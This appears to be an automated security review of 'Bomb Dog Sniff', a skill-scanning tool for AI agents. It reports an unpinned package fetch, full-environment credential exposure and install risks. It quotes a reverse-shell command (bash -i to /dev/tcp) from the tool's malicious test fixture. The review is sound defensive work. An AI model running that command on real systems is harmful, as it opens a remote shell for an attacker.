v0.1.0

Bomb Dog Sniff

ReviewClawScan verdict for this skill. Analyzed May 1, 2026, 5:29 AM.

Analysis

Bomb Dog Sniff appears to be a coherent security scanner, but its safe-install path can modify installed skills while running an unpinned external ClawHub package with the user's full environment.

Guidance: Review this carefully before installing. The scanner purpose is sensible, but avoid using safe-install on untrusted sources until the ClawHub helper is pinned and the subprocess environment is minimized. Prefer dry-run/manual review, verify the publisher and repository, and do not execute the included malicious test fixture files.

Findings (4)

Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.

Abnormal behavior control

Checks for instructions or behavior that redirect the agent, misuse tools, execute unexpected code, cascade across systems, exploit user trust, or continue outside the intended task.

Agentic Supply Chain Vulnerabilities
Severity: High. Confidence: High. Status: Concern.
safe-download.js
const child = spawn('npx', ['clawhub@latest', 'download', sanitizedName, skillPath], {

The safe-install path executes a package selected by the moving `latest` tag at runtime. Because this path is used to download skills that may then be installed, an unpinned helper package is a material supply-chain risk.

User impact: A changed or compromised latest ClawHub package could run code during the install workflow and influence what gets downloaded or installed.
Recommendation: Pin the ClawHub helper to a reviewed version, verify package provenance/signatures, or use a bundled/download-only client that does not execute an unpinned package.

Tool Misuse and Exploitation
Severity: Low. Confidence: High. Status: Note.
SKILL.md
Download from clawhub/GitHub, scan, and install only if safe.

Installing skills is central to the stated purpose and is disclosed, but it is still high-impact because it changes the agent's installed capabilities.

User impact: If the scanner misses a risky skill or the source is not trustworthy, safe-install can add that skill to the user's OpenClaw environment.
Recommendation: Use `--dry-run` for unfamiliar sources, review findings manually, and prefer known/pinned sources before allowing installation.

Unexpected Code Execution
Severity: Medium. Confidence: Medium. Status: Note.
test/malicious-skill/index.js
exec("bash -i >& /dev/tcp/192.168.1.100/4444 0>&1");

The package includes runnable malicious sample code in a test-fixture path. That appears purpose-aligned for scanner testing, but it would be dangerous if executed directly.

User impact: Accidentally running the malicious test fixture could attempt behavior such as a reverse shell or credential exfiltration.
Recommendation: Keep malicious fixtures inert where possible, do not execute test fixture files directly, and consider storing payloads as quoted test data rather than runnable scripts.

Permission boundary

Checks whether tool use, credentials, dependencies, identity, account access, or inter-agent boundaries are broader than the stated purpose.

Identity and Privilege Abuse
Severity: Medium. Confidence: High. Status: Concern.
safe-download.js
env: { ...process.env, NODE_NO_WARNINGS: '1' },

The external ClawHub downloader subprocess receives the entire environment even though the registry declares no required environment variables or primary credential. Environment variables often contain unrelated API keys, tokens, or account configuration.

User impact: Unrelated credentials present in the user's environment could be exposed to a child process that is not narrowly scoped to this skill's purpose.
Recommendation: Pass a minimal allowlisted environment to child processes and declare any required credentials explicitly.